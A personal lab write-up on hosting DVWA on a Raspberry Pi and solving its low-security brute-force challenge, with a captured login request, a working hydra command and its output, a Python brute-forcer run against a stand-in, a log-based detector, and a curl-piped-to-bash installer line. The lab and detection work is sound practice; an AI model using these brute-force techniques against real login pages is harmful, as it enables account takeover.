2024-12-12 DVWA challenge 1

I finally decided that today would be the day I put my RPi to actual use. I decided on hosting DVWA (Damn Vulnerable Web Application) to practice some basic web-app pentesting techniques; here's how it went.

Setup

The initial setup of DVWA was fairly typical for any Linux application; however, I had a few painful areas to get through. Originally I decided to clone the DVWA repository to my host machine and copy the files over:

scp -r /home/j/DVWA j@10.x.x.x:/home/j/DVWA

Then I ran the following command to (hopefully) download any dependencies:

sudo apt update

This instantly failed; after about 30 minutes of debugging I found that switching to the US APT mirror fixed the issue. Anyway, back on topic.

I attempted to start Apache but ran into quite a few configuration and PATH issues. Every time I fixed one error another would seemingly appear out of nowhere; at this point I decided that my current setup was beyond repair, so I rm -rf'd any Apache-related directories hoping a fresh install would help.

With my system clean of any previous bugs, I decided that the best way to get this working would be to SSH into my RPi and run the setup one-liner from the IamCarron/DVWA-Script repository on GitHub:

sudo bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh)"

This script handled all of the installation perfectly and by running:

sudo systemctl start apache2

Along with some extra MySQL configuration, I successfully started DVWA on my RPi and can now access it from my main computer.

Now that I am able to navigate to http://10.x.x.x:xxxx/DVWA I can start testing the site.

Challenge 1: Brute force

Note: This challenge was done on DVWA's "low" security level (the easiest setting, the one the security=low cookie below selects).

Credits: I used This article as a general guide.

The first thing I did for this challenge was open Burp Suite. I wanted to see what requests were being made when I attempted a login; any form of recon like this is essential to build a mental map of a system.

Here is my first test.

I started by running Burp's browser through the proxy and attempted a login with j:j. I copied the request and its response to get a better idea of what's happening under the hood:

curl --path-as-is -i -s -k -X $'GET' \
    -H $'Host: 10.0.0.100:8898' -H $'Accept-Language: en-US,en;q=0.9' \
    -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36' \
    -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
    -H $'Referer: http://10.0.0.100:8898/DVWA/vulnerabilities/brute/?username=&password=&Login=Login' \
    -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \
    -b $'PHPSESSID=6uegn0i91ebjsi55eenm6kkgel; security=low' \
    $'http://10.0.0.100:8898/DVWA/vulnerabilities/brute/?username=j&password=j&Login=Login'

HTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 00:31:38 GMT
Server: Apache/2.4.59 (Raspbian)
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1406
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

Breaking this down, we can see that when we attempt to log in the browser sends an HTTP GET request to my DVWA server with the username and password as URL parameters: in this case username=j and password=j. Two things are worth noting. First, because the credentials sit in the query string they also end up in the Referer header of the next request (look at the Referer line above, which carries the previous form's username= and password= fields), in browser history, and in the server's access log. Second, the server answers 200 OK even though the login failed, so the status code cannot tell a good guess from a bad one; any automated attack has to match on the body text instead.

With this knowledge we can try to perform a brute force by modifying these URL parameters. For this, I will use THC Hydra.
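Before reaching for hydra it helps to see what the tool is actually doing. The following is an added example, not code from the original post or from DVWA or hydra: a minimal re-implementation of the GET-form brute force against DVWA's brute-force page at security=low. The HTTP layer is injected as a callable so the logic runs offline against a constructed stand-in for DVWA; the session ID and target URL are reused from the post only as labels, and every function name is mine.

```python
# Added example, not code from the original post or from DVWA/hydra: a minimal
# re-implementation of what `hydra http-get-form` does against DVWA's brute-force
# page at security=low. The HTTP layer is injected as a callable so the logic runs
# offline against a constructed stand-in for DVWA; all function and variable names
# are my own.
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, urlencode, urlparse

# Strings DVWA's brute/index.php emits at security=low. The failure text is the
# one the hydra command matches on; the success text is what a correct guess
# returns inside a logged-in session.
FAILURE_MARKER = "Username and/or password incorrect."
SUCCESS_MARKER = "Welcome to the password protected area"

# One HTTP exchange, reduced to what the attack logic needs.
Response = Tuple[int, Dict[str, str], str]          # (status, headers, body)
Sender = Callable[[str, Dict[str, str]], Response]  # (url, cookies) -> response


def build_login_url(base: str, username: str, password: str) -> str:
    """Reproduce the GET form seen in Burp: credentials travel in the query string."""
    query = urlencode({"username": username, "password": password, "Login": "Login"})
    return f"{base}/vulnerabilities/brute/?{query}"


def classify(response: Response) -> str:
    """Interpret one guess. DVWA answers 200 OK either way, so the status code is
    useless; only the body separates hit from miss. A dead session never shows the
    failure text at all because DVWA redirects to login.php instead."""
    status, headers, body = response
    if status in (301, 302) and "login.php" in headers.get("Location", ""):
        return "session-expired"
    if FAILURE_MARKER in body:
        return "miss"
    if SUCCESS_MARKER in body:
        return "hit"
    return "unknown"


def brute_force(base: str, username: str, wordlist: List[str],
                cookies: Dict[str, str], send: Sender) -> Optional[str]:
    """Try each candidate in order and return the first hit, or None.
    A rejected session aborts the run: a plain 'failure string absent' check
    (what an unguarded F= match amounts to) would otherwise report the very
    first password in the list as valid."""
    for candidate in wordlist:
        verdict = classify(send(build_login_url(base, username, candidate), cookies))
        if verdict == "hit":
            return candidate
        if verdict == "session-expired":
            raise RuntimeError(f"session cookie rejected while trying {candidate!r}")
    return None


def make_fake_dvwa(valid: Dict[str, str], live_session: str) -> Sender:
    """Constructed stand-in for DVWA's brute-force page at security=low: no
    lockout, no delay, 200 on both outcomes, redirect when the session is bad."""
    def send(url: str, cookies: Dict[str, str]) -> Response:
        if cookies.get("PHPSESSID") != live_session:
            return 302, {"Location": "../../login.php"}, ""
        params = dict(parse_qsl(urlparse(url).query, keep_blank_values=True))
        user, password = params.get("username", ""), params.get("password", "")
        if user in valid and valid[user] == password:
            return 200, {}, f"<p>{SUCCESS_MARKER} {user}</p>"
        return 200, {}, f"<pre><br />{FAILURE_MARKER}</pre>"
    return send


def demo() -> Optional[str]:
    """Run the attack against the stand-in with a short constructed wordlist
    (a subset of the 22 entries hydra walks in the post). Session ID and target
    are the ones from the post, reused here only as labels."""
    session = "7jnr60dnenvsmqabg1fcemm14h"
    wordlist = ["", "admin", "123456", "root", "toor", "letmein", "password"]
    send = make_fake_dvwa({"admin": "password"}, live_session=session)
    return brute_force("http://10.0.0.100:8898/DVWA", "admin", wordlist,
                       {"security": "low", "PHPSESSID": session}, send)


if __name__ == "__main__":
    print(demo())
```

To point this at a real lab box, replace the stand-in with a sender that performs the GET with a requests-style client and passes the cookies through; the classification and abort-on-redirect logic stay the same, and that abort is exactly the check a tool like hydra does not do for you.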

After a few hours of suffering (at least I can say I have experience with hydra now…) I finally managed to successfully brute force the password; here was the final command:

hydra -l admin -P ~/Documents/tools/lists/DVWA-PW-1.txt http-get-form:"//10.x.x.x:xxxx/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie:security=low;PHPSESSID=7jnr60dnenvsmqabg1fcemm14h:Username and/or password incorrect" -V

To break this down:

-l admin fixes the username to a single value, and -P points at the password wordlist (22 entries here); hydra walks the whole list for that one user.

http-get-form://10.x.x.x:xxxx/DVWA/vulnerabilities/brute/ selects hydra's GET-form module and names the target. The shell joins the module name and the quoted string into one URL, so this is equivalent to giving the host, port and path separately.

username=^USER^&password=^PASS^&Login=Login is the query string Burp showed, with ^USER^ and ^PASS^ as placeholders that hydra substitutes on every attempt.

H=Cookie:security=low;PHPSESSID=... attaches the cookies from a browser session that is already logged in to DVWA. The session ID differs from the Burp capture above because it is a newer session; what matters is that it is live. Without a valid PHPSESSID, DVWA redirects every request to login.php, the failure string never appears in the response, and hydra reports the first password in the list as valid.

The last field, Username and/or password incorrect, is the failure string (hydra treats an unprefixed trailing field as F=). The server answers 200 OK whether the login succeeds or fails, so this body text is the only thing that separates a hit from a miss.

-V prints every attempt. The child numbers 0 to 15 in the output are hydra's default 16 parallel tasks; at security=low DVWA imposes no delay or lockout, so all of them run unthrottled.

And its output:

[ATTEMPT] target 10.0.0.100 - login "admin" - pass "" - 1 of 22 [child 0] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "admin" - 2 of 22 [child 1] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "123456" - 3 of 22 [child 2] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "root" - 4 of 22 [child 3] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "toor" - 5 of 22 [child 4] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "guest" - 6 of 22 [child 5] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "user" - 7 of 22 [child 6] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "welcome" - 8 of 22 [child 7] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "qwerty" - 9 of 22 [child 8] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "letmein" - 10 of 22 [child 9] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "monkey" - 11 of 22 [child 10] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "admin123" - 12 of 22 [child 11] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "letmein123" - 13 of 22 [child 12] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "password123" - 14 of 22 [child 13] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "admin1234" - 15 of 22 [child 14] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "secret" - 16 of 22 [child 15] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "test123" - 17 of 22 [child 0] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "passw0rd" - 18 of 22 [child 1] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "summer" - 19 of 22 [child 2] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "football" - 20 of 22 [child 3] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "password1234" - 21 of 22 [child 10] (0/0)
[ATTEMPT] target 10.0.0.100 - login "admin" - pass "password" - 22 of 22 [child 5] (0/0)
[8898][http-get-form] host: 10.0.0.100   login: admin   password: password
1 of 1 target successfully completed, 1 valid password found
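The same run looks very different from the server side. As an added example that is not part of the original post, here is the defender's view: because DVWA's form sends credentials in a GET query string, every one of the 22 guesses above, including the one that worked, lands verbatim in Apache's access log. The log lines are constructed in Apache combined-log format from the password list in the hydra output; the client IPs, timestamps and User-Agent strings are assumptions, as are all the function names.

```python
# Added example, not from the original post: the defender's view of the hydra run.
# DVWA's form sends credentials in a GET query string, so every guess, including
# the one that worked, lands verbatim in Apache's access log. The log lines are
# constructed here in Apache combined-log format from the 22 passwords in the
# hydra output; the client IPs, timestamps and User-Agent strings are
# assumptions, as are all the function names.
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

ATTACKER_IP = "10.0.0.50"   # assumed attacker box
BROWSER_IP = "10.0.0.7"     # assumed box used for the manual j:j test
GUESSES = ["", "admin", "123456", "root", "toor", "guest", "user", "welcome",
           "qwerty", "letmein", "monkey", "admin123", "letmein123", "password123",
           "admin1234", "secret", "test123", "passw0rd", "summer", "football",
           "password1234", "password"]


def _log_line(ip: str, second: int, user: str, password: str, ua: str) -> str:
    """Build one constructed combined-log entry for a brute/ request (always 200)."""
    return (f'{ip} - - [13/Dec/2024:00:41:{second:02d} +0000] '
            f'"GET /DVWA/vulnerabilities/brute/?username={user}&password={password}'
            f'&Login=Login HTTP/1.1" 200 1406 "-" "{ua}"')


# One manual login from a browser, then the hydra burst a few seconds later.
SAMPLE_LOG = [_log_line(BROWSER_IP, 2, "j", "j", "Mozilla/5.0")] + [
    _log_line(ATTACKER_IP, 10 + i, "admin", pw, "Mozilla/4.0 (Hydra)")
    for i, pw in enumerate(GUESSES)
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')


def parse_line(line: str) -> Optional[Dict]:
    """Split one combined-log line into the fields the detection needs."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "path": target.path,
        "params": dict(parse_qsl(target.query, keep_blank_values=True)),
        "ua": m["ua"],
    }


def find_bruteforce(lines: List[str], window_seconds: int = 60,
                    threshold: int = 10) -> List[Dict]:
    """Flag any client that tries >= threshold distinct passwords against the
    login page within a sliding time window. The status code is deliberately
    not consulted: DVWA returns 200 for both outcomes, so volume and variety
    of guesses are the signal."""
    per_client: Dict[Tuple[str, str], List[Tuple[datetime, str]]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and "/vulnerabilities/brute/" in rec["path"]:
            per_client[(rec["ip"], rec["path"])].append(
                (rec["ts"], rec["params"].get("password", "")))
    alerts = []
    for (ip, path), events in per_client.items():
        events.sort(key=lambda e: e[0])
        flagged, start = False, 0
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            if len({pw for _, pw in events[start:end + 1]}) >= threshold:
                flagged = True
                break
        if flagged:
            alerts.append({"ip": ip, "path": path, "attempts": len(events),
                           "distinct_passwords": len({pw for _, pw in events})})
    return alerts


def recover_credentials(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Show the leak: (client, username, password) for every login request,
    read straight out of the query string recorded in the log."""
    creds = []
    for line in lines:
        rec = parse_line(line)
        if rec and "/vulnerabilities/brute/" in rec["path"]:
            creds.append((rec["ip"], rec["params"].get("username", ""),
                          rec["params"].get("password", "")))
    return creds


if __name__ == "__main__":
    for alert in find_bruteforce(SAMPLE_LOG):
        print(alert)
    print(recover_credentials(SAMPLE_LOG)[-1])
```

Two takeaways from running this over the sample: the attacker's 22 guesses in about 20 seconds trip the threshold while the single manual login does not, and the legitimate j:j login is just as readable in the log as the brute-force hits, which is the real cost of a login form that uses GET.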

Conclusion

Although the setup and debugging were pretty frustrating, I really enjoyed this lab once it was working, since I'd had minimal experience with both brute-forcing and cookie manipulation.